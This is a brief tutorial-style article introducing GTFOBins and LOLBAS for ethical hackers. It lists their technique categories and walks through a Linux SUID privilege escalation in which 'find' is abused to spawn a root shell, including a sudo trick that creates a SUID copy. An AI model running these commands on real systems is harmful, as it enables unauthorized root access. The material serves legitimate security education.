GTFOBins and LOLBAS: Mastering Binary Exploitation for Unix and Windows
In the realm of cybersecurity, tools like GTFOBins and LOLBAS have become indispensable for ethical hackers. This guide delves into the capabilities of these tools, emphasizing their role in Unix and Windows environments, respectively, and their synergy with multifunctional tools like Cyber Chef.
Understanding GTFOBins and LOLBAS
GTFOBins is a curated collection of Unix binaries used for bypassing local security restrictions, while LOLBAS (Living Off The Land Binaries And Scripts) serves a similar purpose in Windows environments. Both tools focus on exploiting system vulnerabilities through native binaries, making them key resources in ethical hacking.
GTFOBins Techniques:
- Shell Command Execution: Utilizing binaries to gain a command shell.
- Reverse Shells: Creating inbound connections to a remote controller.
- Bind Shells: Opening a shell that listens for incoming connections.
- File Operations: Including upload, download, write, and read capabilities.
- Library Loading: Injecting custom libraries into processes.
- Privilege Escalation Techniques: Exploiting SUID, sudo, and capabilities for elevated access.
- Non-Interactive Shells: Executing reverse and bind shells without direct interaction.
- File Manipulation: Advanced methods for file upload, download, and modification.
- Limited SUID Exploits: Leveraging specific Linux binaries for privilege escalation.
- Script-based Attacks: Using native scripts to perform complex tasks or bypass security.
LOLBAS Techniques:
- Alternate Data Streams (ADS): Utilizing hidden streams in NTFS for covert operations.
- Application Whitelist (AWL) Bypass: Executing scripts or binaries that bypass security whitelists.
- Compilation: Using native tools to compile code from source.
- Copying Files: Leveraging binaries to move files, often for data exfiltration or deployment of tools.
- Credential Access: Extracting or manipulating system credentials.
- Decoding/Encoding: Transforming data formats using built-in scripts and binaries.
- Downloading/Uploading Files: Transferring files in and out of a target system.
- Data Dumping: Extracting sensitive information from system processes or files.
- Execution: Running commands or scripts through native binaries.
- Reconnaissance: Gathering information about the system, network, or users.
- User Account Control (UAC) Bypass: Executing actions without triggering UAC prompts.
- Uploading: Sending data from the compromised system to a remote server.
Example for GTFOBins and SETUID exploit
First we need to find SETUID binary in the system:
user@host:~$ find / -perm -4000 2>/dev/null ... /bin/find ...
Then we check on GTFOBins for the /bin/find exploit list, which give us:
Then we can simply apply the SUID exploit field:
$ ./find . -exec /bin/sh -p \; -quit
$ whoami
# root
If we do not find SUID /bin/find binary BUT we have sudo permission (not the same as being root). We can create the local copy of the binary with SUID:
$ sudo install -m =xs $(which find) .
$ ./find . -exec /bin/sh -p \; -quit
$ whoami
# root
In this scenario, the first command creates a SUID version of the find
binary in the current directory. The second command then runs this binary, which executes /bin/sh -p
, launching a shell with elevated privileges.
GTFOBins and LOLBAS: Essential Companions for Tools Like CyberChef
While Cyber Chef offers a broad spectrum of functions for data manipulation and analysis, GTFOBins and LOLBAS provide the necessary means to identify and exploit system vulnerabilities at a binary level. These tools complement Cyber Chef, with GTFOBins catering to Unix systems and LOLBAS to Windows, forming a comprehensive toolkit for ethical hackers.
Target Audience
Both GTFOBins and LOLBAS are crucial for ethical hackers, regardless of their focus on Unix or Windows systems. They offer invaluable insights and techniques for users at all levels, from beginners to seasoned professionals.
Conclusion
Embracing GTFOBins and LOLBAS is essential for anyone serious about ethical hacking. They not only enable the identification and exploitation of system vulnerabilities but also represent the adaptive nature of cybersecurity defense strategies across different operating systems. Integrating these tools into your cybersecurity toolkit is a step toward mastering the art of ethical hacking in a diverse technological landscape.